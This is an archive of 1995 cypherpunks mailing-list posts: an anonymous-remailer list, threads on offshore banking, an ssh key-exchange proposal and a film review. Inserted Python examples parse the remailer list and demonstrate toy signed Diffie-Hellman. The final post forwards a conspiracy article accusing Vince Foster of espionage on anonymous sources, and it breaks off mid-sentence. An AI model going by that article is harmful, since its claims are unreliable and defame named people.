   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 31 Jul 95 6:00:04 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
spook    remailer@spook.alias.net         ****+-******    16:34  99.99%
vishnu   mixmaster@vishnu.alias.net       **+*+-******    16:39  99.95%
gondolin mixmaster@gondolin.org           -------* -++  1:28:04  99.92%
ford     remailer@bi-node.zerberus.de     -**-+-*.*-*#    46:06  99.86%
ideath   remailer@ideath.goldenbear.com   .-.......-   13:23:04  99.84%
vox      remail@vox.xs4all.nl             .--..-..-..  23:22:24  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*** -****##    11:33  99.68%
portal   hfinney@shell.portal.com         **** -****##     7:01  99.67%
replay   remailer@replay.com              +***  ******    15:31  99.32%
alumni   hal@alumni.caltech.edu           **** -****##     7:38  99.17%
rmadillo remailer@armadillo.com           ++++-. ++.-+  4:01:54  99.15%
hacktic  remailer@utopia.hacktic.nl       ****  ******    16:41  98.62%
crown    mixmaster@kether.alias.net       -+--- +----   2:00:09  98.43%
rebma    remailer@rebma.mn.org            +_.-..--..+  23:31:28  97.97%
extropia remail@extropia.wimsey.com       ..--.---.    13:06:46  94.87%
penet    anon@anon.penet.fi               -------- -**  4:39:15  91.60%
hroller  hroller@c2.org                   #*--+--*  -+  3:17:36  90.05%
rahul    homer@rahul.net                  ***++-*****#    10:25  99.99%
syrinx   syrinx@c2.org                    -- -----  -   5:03:24  88.62%
mix      mixmaster@remail.obscura.com     ---+----  .  15:07:06  85.77%
c2       remail@c2.org                      -----*  -+  3:59:22  85.39%
flame    remailer@flame.alias.net         +++++    +++    55:37  74.06%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
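
A parser for the two parts of the listing above, written as an added example (it is not premail's code and not part of the original post). It reads the $remailer{...} lines and the ping table, applies the trailing-period rule for "pgp.", and filters by flags and uptime; the function and field names are hypothetical, and the sample input is a few lines copied from the listing.

```python
import re
from dataclasses import dataclass
from typing import Optional

# $remailer{"name"} = "<address> flag flag ...";
CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";\s*$')
# name  address  history (may contain spaces)  latency  uptime%
STATS_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d\d)\s+(\d+(?:\.\d+)?)%\s*$')

# Constructed sample: lines copied from the listing in the message above.
SAMPLE = r'''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
catalyst@netcom.com is _not_ a remailer.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
gondolin mixmaster@gondolin.org           -------* -++  1:28:04  99.92%
vox      remail@vox.xs4all.nl             .--..-..-..  23:22:24  99.99%
portal   hfinney@shell.portal.com         **** -****##     7:01  99.67%
penet    anon@anon.penet.fi               -------- -**  4:39:15  91.60%
flame    remailer@flame.alias.net         +++++    +++    55:37  74.06%
'''


@dataclass
class Remailer:
    name: str
    address: str
    flags: frozenset
    pgp_key_id: Optional[str]      # None when the remailer has no pgp flag
    history: str = ""
    latency_s: Optional[int] = None
    uptime: Optional[float] = None


def parse_listing(text):
    """Return {short name: Remailer} built from both parts of the listing."""
    remailers = {}
    for line in text.splitlines():
        m = CONFIG_RE.match(line)
        if m:
            name, address, raw = m.group(1), m.group(2), m.group(3).split()
            # "pgp." means the short name is the encryption key ID,
            # plain "pgp" means the full address is.
            key_id = name if "pgp." in raw else address if "pgp" in raw else None
            flags = frozenset(flag.rstrip(".") for flag in raw)
            remailers[name] = Remailer(name, address, flags, key_id)
            continue
        m = STATS_RE.match(line)
        if m and m.group(1) in remailers:
            entry = remailers[m.group(1)]
            if m.group(2) != entry.address:
                continue               # table row does not match the config line
            entry.history = m.group(3)
            seconds = 0
            for part in m.group(4).split(":"):   # m:ss or h:mm:ss
                seconds = seconds * 60 + int(part)
            entry.latency_s = seconds
            entry.uptime = float(m.group(5))
    return remailers


def select(remailers, require, forbid=frozenset(), min_uptime=0.0):
    """Names of remailers with all required flags, none of the forbidden
    ones, and at least min_uptime percent, fastest average latency first."""
    usable = [r for r in remailers.values()
              if r.uptime is not None and r.uptime >= min_uptime
              and set(require) <= r.flags and not (set(forbid) & r.flags)]
    return [r.name for r in sorted(usable, key=lambda r: r.latency_s)]


if __name__ == "__main__":
    listing = parse_listing(SAMPLE)
    for name in select(listing, {"cpunk", "pgp"}, {"mon", "filter"}, 99.0):
        r = listing[name]
        print(name, r.address, "key id:", r.pgp_key_id, "latency(s):", r.latency_s)
```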




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 04:21:21 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <v02120d01ac426b1b8c6d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:59 AM 7/31/95, Bill Stewart wrote:
>So good for her.  I've spent most of the evening chatting on cypherpunks
>and cyberia rather than writing code....  Some recent survey found that
>60% of time that average folks spend on the net is communications rather
>than information retrieval.

I believe I wasn't clear. My point was that Ms. Bullock lives in AOL chat
rooms and thinks it's the internet.

Most of my time on the net is spent communicating (albeit badly) also.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 31 Jul 95 07:57:21 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Zimmermann legal fund
In-Reply-To: <199507310635.XAA25441@ix9.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950731074836.14305B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 30 Jul 1995, Bill Stewart wrote:

> Aren't there some banks or similar companies that are world-wide,
> but have US branches?  I think SwissBankCorp or somebody like that
> has an office in San Francisco; would it be possible for you to transfer
> money to someone with an account there who's really in, say, Switzerland
> or the UK or Hong Kong?

Foreign representative offices have very limited powers under US
banking law.  In addition, they have to be as forthcoming with
US authorities as do US banks.  There is no greater privacy with
them than with US banks doing the same sorts of transfers.  They
do make it a little easier to open Swiss or other offshore bank
accounts because they can handle the identity verification stuff
here, so you don't have to go there.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 31 Jul 95 08:15:44 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: The Net (short movie review)
In-Reply-To: <199507310856.BAA09839@ix7.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950731075728.14305C-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 31 Jul 1995, Bill Stewart wrote:

> I rather enjoyed the movie, though I did share the experience of being
> one of the two or three people in the theater laughing at various
> technical gaffes and/or in-jokes.  Obviously, you can't take anything
> from Hollywood too seriously technically, but they did look at a few
> social issues related to computerisation, such as the isolation,
> computer addiction, lack of face-to-face relationships, difficulty in
> knowing what's real when everything's on the computer, vulnerability of
> society to computer problems, trustability of people who tell you that
> you can trust their computer security system for everything - even the
> government uses it!   So they didn't look into them too deeply - they're
> Hollywood.

Got to agree with Bill here.  Book, TV, movie, etc. stories are
not about "what"; they are about "what if."  For our purposes, it
was sufficient that THE NET plausibly created distrust in
solutions provided by monolithic big brothers.  A lot of elements
echoed arguments about Clipper, this Alltel conspiracy stuff,
secret back doors, manufactured justifications for government
mandated or endorsed security programs, etc.  Of course the
nominal enemy was an evil corporation, but it could certainly
be read as something more.  The "Praetorians" are taken right
out of history, and can only be interpreted as a governmental group.

I hope the movie is very popular.  It helps us by inducing 
healthy cynicism with a dash of paranoia.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thresher!thad@netcom.com (Thaddeus J. Beier)
Date: Mon, 31 Jul 95 09:24:29 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507311602.JAA01170@thresher>
MIME-Version: 1.0
Content-Type: text/plain



Hadmut,

There has been an ongoing debate about this, for several years.  The way
that it is supposed to work is that the TV broadcasters would include
some kind of rating information in the vertical interval between frames,
and the TV's that are sold after a certain date would interpret these
rating signals to darken the screen during shots, or more likely, programs
that are deemed inappropriate to the viewer.  The idea would be that
parents could program their tv's to permit some range of sex and/or
violence, and thus could protect their children somewhat.

The chip that interprets the content does it solely based on the rating
information.  This is the so-called "v-chip" (v for violence, I think,
not for video) that you see in the press.

I think that a more reasonable approach would be to sell a box that
sits between the video signal source and the TV, or that is within
the TV, that is connected to some private rating service.  I think
that any kind of mandated rating would be unlikely to meet the
qualifications of most people.  Besides, what I would really
like to filter out, what I find to be incredibly violent to the
minds of children, is commercial advertising.  Private rating
services could take care of these, easily, as well.

The idea of boxes outside the TV is usually casually shot down
as unworkable; that kids, with their infinite time, patience,
cleverness, and guile, will find a way to bypass the box.
I'd say that it's worth a try.  And, if it will blank
commercials (and pause your VCR during them, say) I think
it will have tremendous revenues to enable research into
a secure solution.  One such secure solution would be that
you would take your TV into a shop, and have the antenna
connection modified, so that any tampering would be
detected.  Or have it done as a house call, whatever.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 09:00:19 PDT
To: cypherpunks@toad.com
Subject: Ivy Bells, Smersh, and the Rosenbergs
Message-ID: <ac424ae9050210049fd9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 AM 7/31/95, Bill Stewart wrote:
>At 12:52 AM 7/31/95 -0700, rick hoselton wrote:
>>
>>>Different cases - the Walkers gave away information on how the Yankees were
>>>stealing Russian secrets, which the Russians patched up by encrypting.
>>
>>Really?  Do you have a reference for this?  I am interested.
>No refs, this is just memory of the news.  There was an undersea cable
>north of Siberia somewhere that carried a lot of unencrypted military
>traffic, which US Submarines were eavesdropping on.  I think Walker was
>the one who leaked it, and they started encrypting.  Refs on the Walkers
>should be easy to find in the library; there were a couple of books.

There were at least 3 books, plus at least one t.v. miniseries, plus
extensive media coverage. Until the Aldrich Ames case, this was about the
most serious spying case in modern times. (It may or may not have been
bigger than Ames, depending on the relative importance of "technical means"
vs. "humint.")

The undersea cable eavesdropping program was "Ivy Bells," and was revealed
to the Sovs by Walker and his associates. I don't know if they also knew
about it via alternate sources.

On the other issue, whether either or both of the Rosenbergs were spies,
things have settled yet. Sudoplatov, in "Special Tasks," claims they were
both spies. Others doubt it.

(For you Bond fans, Sudoplatov headed up "Smersh." Russian for "Death to
spies." Yes, it really existed, unlike, say "U.N.C.L.E.")

On the issue of whether in the 1950s the U.S. government knew the
Rosenbergs were spies, we have even less information. A trial was held and
guilty verdict returned, but reasonable folks may disagree. My guess? Yes,
they were probably spies.

The Rosenbergs were certainly the Mumia Abu Jamals of their day.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 31 Jul 95 06:40:21 PDT
To: cypherpunks@toad.com
Subject: Re: "Codebreakers" on PBS
In-Reply-To: <199507310932.CAA27798@netcom9.netcom.com>
Message-ID: <0au49c1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


bart@netcom.com (Harry Bartholomew) writes:

>     For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
>     "The World War II codebreaking efforts known as Enigma and Purple"

If this is the rerun of the show Nova had in March 94, then I highly
recommend it.  I taped it and showed it to the undergrad class on computer
security I taught that semester.  The kids loved it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 31 Jul 95 09:40:18 PDT
To: Mike Bailey <bailey@computek.net>
Subject: OFFSHORE BANKING (Re: Zimmermann legal fund)
In-Reply-To: <Pine.SUN.3.91.950731100140.4105A-100000@bambam.computek.net>
Message-ID: <Pine.SUN.3.91.950731091836.5894C-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 31 Jul 1995, Mike Bailey wrote:

> I open an account with U.S. $$ in a foreign bank who uses francs ... a month 
> later the franc loses 20% of its value as compared to the U.S. dollar. If I 
> close out my account would I not lose 20% of my money because when the money was 
> deposited it was credited to the account in francs ... and when it is withdrawn 
> it converted back to $$ at the current conversion rate ?

If the account is denominated in francs, you take the hit.  If
it is denominated in dollars, you don't.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephane Bortzmeyer <bortzmeyer@cnam.fr>
Date: Mon, 31 Jul 95 00:38:17 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: ssh protocol
In-Reply-To: <199507231145.OAA04620@shadows.cs.hut.fi>
Message-ID: <199507310737.JAA06792@cnam.fr>
MIME-Version: 1.0
Content-Type: text/plain


On Sunday 23 July 95, at 14 h 45, the keyboard of Tatu Ylonen <ylo@cs.hut.fi> wrote:

> People have also suggested using the Photuris protocol that is part of
> the IP Security work being done at IETF
> (ftp://www.cnri.reston.va.us/internet-drafts/draft-ietf-ipsec-photuris-02.txt).
> 
> The basic idea behind the protocol goes roughly like this:
>   1. Exchange session keys using Diffie-Hellman
>   2. Each side sends a signature of the Diffie-Hellman exchange (the
>      signature can be with any of a number of algorithms; RSA and
>      Elliptic Curve systems have been defined).
> 
> If this were adapted to ssh, the protocol would look roughly like
> this:
>   1. Exchange session keys using Diffie-Hellman
>   2. Each side sends a signature of the Diffie-Hellman exchange by its
>      host key
>   3. RSA and Rhosts authentication requests would include a signature
>      by the requesting key.
> 
> This would get rid of the server key and the need to regenerate it,
> because the diffie-hellman exchange already prevents decrypting old
> conversations.  The challenge-dialogs could be avoided (unless they
> are needed for performance reasons to avoid unnecessary signature
> computations).
> 
> One could also eliminate RSA in future and start using some other
> public key cryptosystem if desired.  The Diffie-Hellman patent and the
> generic public key patent expire in 1997; the RSA-patent does not
> expire until about year 2000.
> 
> 
> Anyway, this would be a major change that probably cannot easily be
> made compatibly.  Maybe an incompatible ssh-2.x?  Anyway, I don't want
> to rush into making major changes in the protocol.
> 
> I would very much like to hear comments on this approach.
> 
>     Tatu

Stephane Bortzmeyer           Conservatoire National des Arts et Metiers
bortzmeyer@cnam.fr            Laboratoire d'Informatique
                              292, rue Saint-Martin			
tel: +33 (1) 40 27 27 31      75141 Paris Cedex 03
fax: +33 (1) 40 27 27 72      France	

"C'est la nuit qu'il est beau de croire a la lumiere." E. Rostand
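
The exchange outlined in the quoted proposal (Diffie-Hellman, then each side signing the exchange with its host key), as an added example that is not part of the original message and is not ssh or Photuris code. It is stdlib-only Python with constructed toy parameters (a Mersenne-prime modulus and textbook RSA host keys, both assumptions), all names are hypothetical, and it shows why the signatures are needed: if the public values are replaced in transit, neither signature verifies.

```python
import hashlib
import secrets

# Constructed toy parameters (assumptions, chosen only to stay stdlib-only).
# Mersenne primes are easy to write down but give no real security.
DH_P = 2**521 - 1      # Diffie-Hellman modulus
DH_G = 3               # Diffie-Hellman base
RSA_E = 65537          # public exponent shared by both toy host keys


def make_host_key(p, q):
    """Textbook RSA host key from two primes; returns (n, d)."""
    n = p * q
    return n, pow(RSA_E, -1, (p - 1) * (q - 1))


def _digest(data, n):
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data, host_key):
    n, d = host_key
    return pow(_digest(data, n), d, n)


def verify(data, signature, n):
    return pow(signature, RSA_E, n) == _digest(data, n)


def transcript(client_pub, server_pub):
    """What each side signs: both DH public values, length-prefixed, fixed order."""
    out = [b"signed-dh-example"]
    for value in (client_pub, server_pub):
        raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
        out.append(len(raw).to_bytes(4, "big") + raw)
    return b"".join(out)


class Party:
    def __init__(self, host_key):
        self.host_key = host_key
        self.host_pub = host_key[0]                 # modulus n, known to the peer beforehand
        self._x = secrets.randbelow(DH_P - 3) + 2   # ephemeral secret, one per session
        self.dh_pub = pow(DH_G, self._x, DH_P)

    def session_key(self, peer_pub):
        if not 1 < peer_pub < DH_P - 1:
            raise ValueError("degenerate DH public value")
        shared = pow(peer_pub, self._x, DH_P)
        return hashlib.sha256(shared.to_bytes(66, "big")).digest()


def run_exchange(client, server, substituted_pub=None):
    """Step 1: swap DH public values.  Step 2: each side signs the exchange
    as it saw it, and checks the peer's signature against its own view.
    substituted_pub models a value replaced in transit in both directions.
    Returns (client_accepts, server_accepts, keys_match)."""
    seen_by_client = server.dh_pub if substituted_pub is None else substituted_pub
    seen_by_server = client.dh_pub if substituted_pub is None else substituted_pub
    client_view = transcript(client.dh_pub, seen_by_client)
    server_view = transcript(seen_by_server, server.dh_pub)

    client_sig = sign(client_view, client.host_key)
    server_sig = sign(server_view, server.host_key)

    client_accepts = verify(client_view, server_sig, server.host_pub)
    server_accepts = verify(server_view, client_sig, client.host_pub)
    keys_match = (client.session_key(seen_by_client)
                  == server.session_key(seen_by_server))
    return client_accepts, server_accepts, keys_match


if __name__ == "__main__":
    server = Party(make_host_key(2**521 - 1, 2**607 - 1))
    client = Party(make_host_key(2**1279 - 1, 2**2203 - 1))
    print("untouched exchange:  ", run_exchange(client, server))
    swapped = pow(DH_G, 12345, DH_P)   # constructed replacement value
    print("values replaced:     ", run_exchange(client, server, swapped))
```

No long-lived key ever encrypts the session key here, which is the property the proposal relies on to drop the periodically regenerated server key: the host keys only sign, and the ephemeral exponents are discarded with the Party objects.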




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@CIC.Net>
Date: Mon, 31 Jul 95 06:48:30 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: building libraries
In-Reply-To: <199507310521.WAA08413@ix4.ix.netcom.com>
Message-ID: <199507311348.JAA04346@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon Jul 31 01:25:04 1995: you scribbled...
> 
> At 08:40 PM 7/28/95 -0400, Alex Tang wrote:
> >> The answer is to have some non-USA entity build shareable full fledged 
> >> full powered crypto libraries and provide them for free for the rest of 
> >> the world and for all machines.
> >Wouldn't there still be licensing issues to deal with (in the states at
> >least)??  I'm sure RSA would claim that the package would be in violation
> >of the licensing...
> 
> If you did everything in an RSAREF-compatible manner, that would help;
> I think somebody outside the US has written an RSAREF-clone.
> Some problems include building programs that have generic-callout hooks
> instead of crypto-specific hooks (so that they don't get bitten by ITAR),
> while still maintaining reasonable efficiency and convenience.

Yeah, this would work for everyone except commercial institutions within
the states.  They'd have to get a license agreement for RSA.

...alex...

     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)
Unofficial SSL/HTTPD FAQ: http://petrified.cic.net/~altitude/ssl/ssl.saga.html



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 31 Jul 95 00:49:57 PDT
To: cypherpunks@toad.com
Subject: Why Vince Foster Was Killed
Message-ID: <199507310749.JAA12241@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
From: QDQD56A@prodigy.com (Ct Buskuhl)
Newsgroups: alt.current-events.clinton.whitewater
Subject: Fostergate Reprint
Date: 31 Jul 1995 05:40:06 GMT

James Norman is the Senior Editor for the highly respected FORBES 
magazine. Several months ago, he wrote an article about the death of 
Vince Foster, called "Fostergate." 

  This article was set to run and was pulled at the last minute by forces 
that are unknown at this time. You may recall a similar situation with 
the Washington Post spiking the Mena story at the last minute - despite 
their own lawyers clearing it to run. The Mena story ended up in this 
month's Penthouse magazine of all places. Fortunately Mr. Norman's 
article found a more respectable home - at Media Bypass!
  Media Bypass will feature this article in their August issue. I 
certainly owe them a little plug for posting this in advance. You may 
subscribe to it by calling 1-800-4-BYPASS. 
  The article is as follows:

FOSTERGATE
by James R. Norman

"Was White House Deputy Counsel Vince Foster selling US secrets to Israel?
 The CIA suspects he was."

  TWO weeks before his death on July 20, 1993, White House Deputy Counsel 
Vincent W. Foster went into a deep funk. The official cause of death, 
given by former Independent Counsel Robert Fiske Jr. (who was later 
replaced by Kenneth Starr), was suicide driven by depression over, among 
other things, several newspaper editorials. But Vince Foster had a much 
bigger and darker reason to be seriously burned out. He had just learned 
he was under investigation for espionage.
  Outrageous? To say the least. But a lengthy investigation has located 
over a dozen sources with connections to the intelligence community who 
confirm a shocking story of money laundering and espionage connected to 
the highest levels of the White House. Without grants of immunity, the 
sources risk going to prison for violation of the National Security Act. 
Virtually all have demanded anonymity.
  According to a veteran Central Intelligence Agency operative close to 
the Foster investigation, Foster's first indication of trouble came when 
he inquired about his coded bank account at Banca Della Svizzera Italiana 
in Chiasso, Switzerland and found the account empty. Foster was shocked 
to learn from the bank that someone using his secret authorization code 
had withdrawn all $2.73 million he had stashed there and had moved it to, 
of all places, the U.S. Treasury.
  Then, according to credit card records reviewed by a private 
investigator who has revealed them, Foster canceled the two-day
round-trip TWA and Swiss Air plane tickets to Geneva he had purchased on
his American Express card through the White House travel office on July 1.
  Discreetly he began asking what was afoot, says the CIA source,
confirming that someone in the White House tipped him off. It was bad
news. The CIA had Foster under serious investigation for leaking
high-security secrets to the State of Israel.
  For months, a small cadre of CIA computer hackers known as the Fifth 
Column, armed with a Cray supercomputer, had been monitoring Foster's 
Swiss account. They had located it by tracking money flows from various 
Israeli government accounts after finding Foster's name while secretly 
snooping through the electronic files of Israel's Mossad. Then by 
snooping through the bank files, they gathered all the information needed 
to withdraw the money. 
  Foster was just one of the first of scores of high level U.S. political 
figures to thus have their secret Swiss accounts looted of illicit funds, 
according to both this veteran CIA source and a separate source in 
another intelligence agency. Over the past two years, they say, more than 
$2 billion has been swept out of offshore bank accounts belonging to 
figures connected to the U.S. government with nary a peep from the 
victims or their banks. The claim that Foster and other U.S. figures have 
had offshore accounts has been confirmed by a separate high-ranking CIA 
source and another in the Department of Justice. 
  Various sources, some of them controversial, have contributed other 
pieces to this puzzle. Whatever their motivations, those sources have 
proven remarkably consistent. Their stories jibe well with known facts 
and offer a most plausible explanation for Foster's mysterious depression.
It would also explain Washington's determined effort to dismiss the
Foster affair as a tragic but simple suicide.
  Vince Foster a spy? Actually, it is much worse than that, if the CIA's
suspicions are confirmed by the ongoing foreign counterintelligence probe.
He would have been an invaluable double agent with potential access to
not only high-level political information, but also to sensitive code, 
encryption and data transmission secrets, the stuff by which modern war 
is won or lost. That is because for many years, according to nine 
separate current and former U.S. law enforcement or intelligence 
officials, Foster had been a behind-the-scenes manager of a key support 
company in one of the biggest, most secretive spy efforts on record, the 
silent surveillance of banking transactions both here and abroad.
  This bank snooping effort began in earnest soon after Ronald Reagan 
became president in 1981. Its primary aim was to track the money behind 
international terrorist groups and soon came to be dubbed, "Follow the 
money", according to the originator of the program Norman A. Bailey. Now 
a private Washington consultant on international banking, Bailey was an 
economist and Reagan advisor on the National Security Council. It was
Bailey's idea to begin using powerful new computer and electronic
eavesdropping technologies then emerging to let the intelligence
